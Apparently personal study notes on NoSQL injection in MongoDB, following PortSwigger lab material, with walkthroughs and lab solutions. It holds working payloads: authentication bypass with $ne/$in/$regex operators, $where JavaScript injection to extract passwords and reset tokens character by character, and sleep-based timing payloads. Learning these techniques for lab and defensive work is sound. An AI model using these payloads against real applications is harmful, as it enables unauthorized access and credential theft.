# NoSQL injection

NoSQL injection may enable an attacker to:

- Bypass authentication or protection mechanisms.
- Extract or edit data.
- Cause a denial of service.
- Execute code on the server.

NoSQL databases store and retrieve data in a format other than traditional SQL relational tables. They use a wide range of query languages instead of a universal standard like SQL, and have fewer relational constraints. 

## Types of NoSQL injection

There are two different types of NoSQL injection:

- Syntax injection - This occurs when you can break the NoSQL query syntax, enabling you to inject your own payload. The methodology is similar to that used in SQL injection. However the nature of the attack varies significantly, as NoSQL databases use a range of query languages, types of query syntax, and different data structures.
- Operator injection - This occurs when you can use NoSQL query operators to manipulate queries.

## **NoSQL syntax injection**

You can potentially detect NoSQL injection vulnerabilities by attempting to break the query syntax. To do this, systematically test each input by submitting fuzz strings and special characters that trigger a database error or some other detectable behavior if they're not adequately sanitized or filtered by the application. 

### **Detecting syntax injection in MongoDB**

To test whether the input may be vulnerable, submit a fuzz string in the value of the parameter. An example string for MongoDB is:

```markdown
'"`{
;$Foo}
$Foo \xYZ

# Example
/product/lookup?category='%22%60%7b%0d%0a%3b%24Foo%7d%0d%0a%24Foo%20%5cxYZ%00
```

If this causes a change from the original response, this may indicate that user input isn't filtered or sanitized correctly.

<aside>
💡

NoSQL injection vulnerabilities can occur in a variety of contexts, and you need to adapt your fuzz strings accordingly. Otherwise, you may simply trigger validation errors that mean the application never executes your query.

In this example, we're injecting the fuzz string via the URL, so the string is URL-encoded. In some applications, you may need to inject your payload via a JSON property instead. In this case, this payload would become:

`'\"`{\r;$Foo}\n$Foo \\xYZ\u0000`.

</aside>

- **Determining which characters are processed**
    - To determine which characters are interpreted as syntax by the application, try to inject individual characters. For example, submit `'` or `\'`
- **Confirming conditional behavior**
    - After detecting a vulnerability, the next step is to determine whether you can influence boolean conditions using NoSQL syntax.
    - To test this, send two requests, one with a false condition and one with a true condition. For example use the conditional statements:
        - `' && 0 && 'x` and `' && 1 && 'x`
    - If the application behaves differently, this suggests that the false condition impacts the query logic, but the true condition doesn't. This indicates that injecting this style of syntax impacts a server-side query.
- **Overriding existing conditions**
    - Now that boolean conditions have been identified, try attempt to override existing conditions to exploit the vulnerability. For example, inject a JavaScript condition that always evaluates to true, such as `'||'1'=='1`
    - This results in the following MongoDB query: `this.category == 'fizzy'||'1'=='1'`
    - As the injected condition is always true, the modified query returns all items.
    

<aside>
💡

MongoDB may ignore all characters after a null character. This means that any additional conditions on the MongoDB query are ignored.

An attacker could construct an attack as follows:  `/product/lookup?category=fizzy'%00`

This results in the following NoSQL query: `this.category == 'fizzy'\u0000' && this.released == 1`

If MongoDB ignores all characters after the null character, this removes 
the requirement for the released field to be set to 1. As a result, all 
products in the`fizzy` category are displayed, including unreleased products.

</aside>

## **NoSQL operator injection**

NoSQL databases often use query operators, which provide ways to specify conditions that data must meet to be included in the query result. Examples of MongoDB query operators include:

- `$where` - Matches documents that satisfy a JavaScript expression.
- `$ne` - Matches all values that are not equal to a specified value.
- `$in` - Matches all of the values specified in an array.
- `$regex` - Selects documents where values match a specified regular expression.

### **Submitting query operators**

In JSON messages, insert query operators as nested objects. For example:`{"username":"wiener"}` becomes `{"username":{"$ne":"invalid"}}`.

For URL-based inputs, you can insert query operators via URL parameters. For example, `username=wiener` becomes`username[$ne]=invalid`

If this doesn't work, try the following:

1. Convert the request method from `GET` to `POST`.
2. Change the `Content-Type` header to `application/json`.
3. Add JSON to the message body.
4. Inject query operators in the JSON.

### **Detecting operator injection in MongoDB**

Consider a vulnerable application that accepts a username and password in the body of a `POST` request:

```json
{"username":"wiener","password":"peter"}
```

Test each input with a range of operators. For example, to test whether the username input processes the query operator, you could try the following injection:

```json
{"username":{"$ne":"invalid"},"password":"peter"}
```

If the `$ne` operator is applied, this queries all users where the username is not equal to `invalid`.

If both the username and password inputs process the operator, it may be possible to bypass authentication using the following payload: 

```json
{"username":{"$ne":"invalid"},"password":{"$ne":"invalid"}}
```

This query returns all login credentials where both the username and password are not equal to `invalid`. As a result, you're logged into the application as the first user in the collection.

To target an account, construct a payload that includes a known username, or a username that you've guessed:

```json
{"username":{"$in":["admin","administrator","superadmin"]},"password":{"$ne":""}}
```

## **Exploiting syntax injection to extract data**

In many NoSQL databases, some query operators or functions can run limited JavaScript code, such as MongoDB's `$where` operator and `mapReduce()` function. This means that, if a vulnerable application uses these operators or functions, the database may evaluate the JavaScript as part of the query. You may therefore be able to use JavaScript functions to 
extract data from the database.

### **Exfiltrating data in MongoDB**

Consider a vulnerable application that allows users to look up other registered usernames and displays their role. This triggers a request to the URL: `/user/lookup?username=admin`

This results in the following NoSQL query of the `users` collection:

```json
{"$where":"this.username == 'admin'"}
```

As the query uses the `$where` operator, try attempt to inject JavaScript functions into this query so that it returns sensitive data. For example, send the following payload:`admin' && this.password[0] == 'a' || 'a'=='b`

This returns the first character of the user's password string, enabling you to extract the password character by character. 

You could also use the JavaScript `match()` function to extract information. For example, the following payload enables you to identify whether the password contains digits: `admin' && this.password.match(/\d/) || 'a'=='b`

### **Identifying field names**

Because MongoDB handles semi-structured data that doesn't require a fixed schema,  may need to identify valid fields in the collection before you can extract data using JavaScript injection.

For example, to identify whether the MongoDB database contains a `password` field, you could submit the following payload: `/user/lookup?username=admin' && this.password!='`

Send the payload again for an existing field and for a field that doesn't exist

- `admin' && this.username!=`
- `admin' && this.foo!='`

If the `password` field exists, you'd expect the response to be identical to the response for the existing field (`username`), but different to the response for the field that doesn't exist (`foo`).

<aside>
💡

Alternatively use NoSQL operator injection to extract field names character by character. This enables to identify field names without having to guess or perform a dictionary attack

</aside>

## **Exploiting NoSQL operator injection to extract data**

### **Injecting operators in MongoDB**

Consider a vulnerable application that accepts username and password in the body of a `POST` request:

```json
{"username":"wiener","password":"peter"}
```

To test whether you can inject operators, you could try adding the `$where` operator as an additional parameter, then send one request where the condition evaluates to false, and another that evaluates to true. For example:

```json
{"username":"wiener","password":"peter", "$where":"0"}

{"username":"wiener","password":"peter", "$where":"1"}
```

If there is a difference between the responses, this may indicate that the JavaScript expression in the `$where` clause is being evaluated.

### **Extracting field names**

If you have injected an operator that enables you to run JavaScript, you may be able to use the `keys()` method to extract the name of data fields. For example, submit the following payload: `"$where":"Object.keys(this)[0].match('^.{0}a.*')"`

This inspects the first data field in the user object and returns the first character of the field name. This enables you to extract the field name character by character. 

### **Exfiltrating data using operators**

Alternatively, you may be able to extract data using operators that don't enable you to run JavaScript. For example, you may be able to use the`$regex` operator to extract data character by character.

Consider a vulnerable application that accepts a username and password in the body of a `POST` request. For example:

```json
{"username":"myuser","password":"mypass"}
```

Start by testing whether the `$regex` operator is processed as follows:

```json
{"username":"admin","password":{"$regex":"^.*"}}
```

If the response to this request is different to the one you receive when you submit an incorrect password, this indicates that the application may be vulnerable. You can use the `$regex` operator to extract data character by character. For example, the following payload checks whether the password begins with an`a`:

```json
{"username":"admin","password":{"$regex":"^a*"}}
```

## **Timing based injection**

Sometimes triggering a database error doesn't cause a difference in the application's response. In this situation, you may still be able to detect and exploit the vulnerability by using JavaScript injection to trigger a conditional time delay. 

To conduct timing-based NoSQL injection:

1. Load the page several times to determine a baseline loading time.
2. Insert a timing based payload into the input. A timing based payload causes an intentional delay in the response when executed. For example, `{"$where": "sleep(5000)"}` causes an intentional delay of 5000 ms on successful injection.
3. Identify whether the response loads more slowly. This indicates a successful injection.

The following timing based payloads will trigger a time delay if the password beings with the letter `a`:

```
admin'+function(x){var waitTill = new Date(new Date().getTime() + 5000);while((x.password[0]==="a") && waitTill > new Date()){};}(this)+'

admin'+function(x){if(x.password[0]==="a"){sleep(5000)};}(this)+'
```

## Labs

[**Detecting NoSQL injection**](https://portswigger.net/web-security/nosql-injection/lab-nosql-injection-detection)

```markdown
# Detect
GET /filter?category=Gifts'"`{;$Foo}$Foo\xYZ

# Exploit - display unreleased products.
GET /filter?category=Gifts'||'1'=='1
```

[**Exploiting NoSQL operator injection to bypass authentication**](https://portswigger.net/web-security/nosql-injection/lab-nosql-injection-bypass-authentication)

```json
{
	"username":{
		"$regex":"^admin*"},
		"password":{
			"$ne":""
		}
} 
```

[**Exploiting NoSQL injection to extract data**](https://portswigger.net/web-security/nosql-injection/lab-nosql-injection-extract-data)

[NoSQL Data Exfiltration - MultiThreading](Scripts/NoSQL%20Data%20Exfiltration%20-%20MultiThreading%203061135e7b5280be918bdb703c885768.md)

```
GET /user/lookup?user=administrator' && this.password.length < 20 || 'a'=='b
GET /user/lookup?user=administrator' && this.password[0] == 'a' || 'a'=='b
GET /user/lookup?user=administrator' && this.password[0] == 'b' || 'a'=='b
GET /user/lookup?user=administrator' && this.password[0] == 'c' || 'a'=='b
**...**
```

[**Exploiting NoSQL operator injection to extract unknown fields**](https://portswigger.net/web-security/nosql-injection/lab-nosql-injection-extract-unknown-fields)

[NoSQL Fields Extraction Part 1 - MultiThreading](Scripts/NoSQL%20Fields%20Extraction%20Part%201%20-%20MultiThreading%203071135e7b5280f6abf4f86553272025.md)

[NoSQL Fields Extraction Part 2 - MultiThreading](Scripts/NoSQL%20Fields%20Extraction%20Part%202%20-%20MultiThreading%203071135e7b5280e98300f63a5d3f9ae7.md)

```markdown
# Fields Exfiltration - Fuzzing "Object.keys(this)[0].match('^.{1}a.*')"
{
	"username":"carlos",
	"password":{
		"$ne": "Invalid"
	},
	"$where": "Object.keys(this)[0].match('^.{1}a.*')"
}

# Reset Token Exfiltration - Fuzzing "this.pwResetTkn.match('^.{1}a.*')"

{
	"username":"carlos",
	"password":{
		"$ne": "Invalid"
	},
	"$where": "this.pwResetTkn.match('^.{1}i.*')"
}
```